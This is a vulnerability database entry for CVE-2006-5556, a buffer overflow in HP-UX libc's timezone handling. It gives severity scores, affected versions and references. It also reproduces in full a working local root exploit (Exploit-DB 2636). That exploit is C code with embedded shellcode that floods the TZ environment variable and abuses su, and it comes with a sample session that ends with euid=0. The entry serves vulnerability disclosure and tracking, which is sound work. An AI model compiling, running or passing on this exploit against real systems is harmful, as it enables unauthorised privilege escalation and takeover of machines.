CVE-2006-5556 : Detail

CVE-2006-5556

0.27%V3
Local
2006-10-27
14h00 +00:00
2017-10-18
14h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in the localtime_r function, and certain other functions, in libc in HP-UX B.11.11 and possibly other versions allows local users to execute arbitrary code via a long TZ environment variable.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 2636

Publication date : 2006-10-23 22h00 +00:00
Author : prdelka
EDB Verified : Yes

/* HP-UX libc timezone environment overflow exploit * ================================================ * HP-UX libc contains an exploitable stack overflow * in the handling of "TZ" environment variable. The * problem occurs due to insufficient bounds checking * in the localtime_r() and related functions. Any suid * or sgid program which uses the timezone functions can * be used as an attack vector. This exploit uses "su" * to obtain root priviledges. * * Example. * $ cc prdelka-vs-HPUX-libc.c -o prdelka-vs-HPUX-libc * /usr/ccs/bin/ld: (Warning) At least one PA 2.0 object file * (prdelka-vs-HPUX-libc.o) was detected. The linked output may not run * on a PA 1.x system. * $ uname -a * HP-UX hpux B.11.11 U 9000/785 2012383315 unlimited-user license * $ id * uid=102(user) gid=20(users) * $ ./prdelka-vs-HPUX-libc * [ HP-UX libc timezone environment overflow * Password: * # id * uid=102(user) gid=20(users) euid=0(root) * * - prdelka */ char shellcode[]="\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22" "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08" "\xb4\x16\x70\x16""/bin/sh"; int main(){ char *a, adr[4],ptr1[4],ptr2[4],*b,*envp[3]; int i; *(unsigned long*)adr=0x10eC7f7F; *(unsigned long*)ptr1=0x059c7f7f; *(unsigned long*)ptr2=0x7f7f059c; b=(char*)malloc(126); memset(b,0,126); a=b; sprintf(b,"PATH="); b+=5; for(i=0;i<120;i++) *b++=ptr1[i%4]; envp[0]=a; b=(char*)malloc(809); memset(b,0,809); a=b; sprintf(b,"MANPATH="); b+=8; for(i=0;i<800;i++) *b++=ptr1[i%4]; envp[1]=a; b=(char*)malloc(3429); memset(b,0,3427); a=b; sprintf(b,"TZ="); b+=3; for(i=0;i<2384;i++) *b++=ptr1[i%4]; for(i=0;i<4;i++) *b++=ptr2[i%4]; for(i=0;i<1002;i++) *b++=adr[i%4]; for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; envp[2]=a; envp[3]=0; printf("[ HP-UX libc timezone environment overflow\n"); execle("/usr/bin/su","pdk",0,envp); } // milw0rm.com [2006-10-24]

Products Mentioned

Configuraton 0

Hp>>Hp-ux >> Version 11.00

Hp>>Hp-ux >> Version 11.4

Hp>>Hp-ux >> Version 11.11

References

https://www.exploit-db.com/exploits/2636
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/20718
Tags : vdb-entry, x_refsource_BID